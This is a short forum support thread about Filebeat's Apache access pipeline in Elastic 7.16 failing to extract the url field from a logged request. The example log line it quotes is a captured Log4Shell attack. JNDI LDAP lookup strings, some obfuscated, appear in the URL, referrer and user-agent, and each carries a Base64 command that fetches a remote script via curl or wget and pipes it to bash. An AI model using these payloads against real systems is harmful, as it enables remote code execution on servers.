Missing url

I have a particular HTTP request logged in my access.log.
The request is found using the http.referrer, but the corresponding url object is missing.
I have the following configuration:

  • Elasticsearch 7.16.1
  • Filebeat 7.16.1 [pipeline: filebeat-7.16.0-apache-access-pipeline]
  • Kibana 7.16.1

Welcome to our community! :smiley:

I think you need to provide a bit more context here, including examples of your events.

Below is a log event.
Elasticsearch did assign it an http.referrer property. But the url object is not extracted; therefore, I cannot use url.original for my query.

195.54.160.149 - - [23/Dec/2021:21:25:08 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODUuNzQuOC4yMTg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NS43NC44LjIxODo0NDMpfGJhc2g=} HTTP/1.1" 400 7702 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODUuNzQuOC4yMTg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NS43NC44LjIxODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODUuNzQuOC4yMTg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NS43NC44LjIxODo0NDMpfGJhc2g=}" "-"
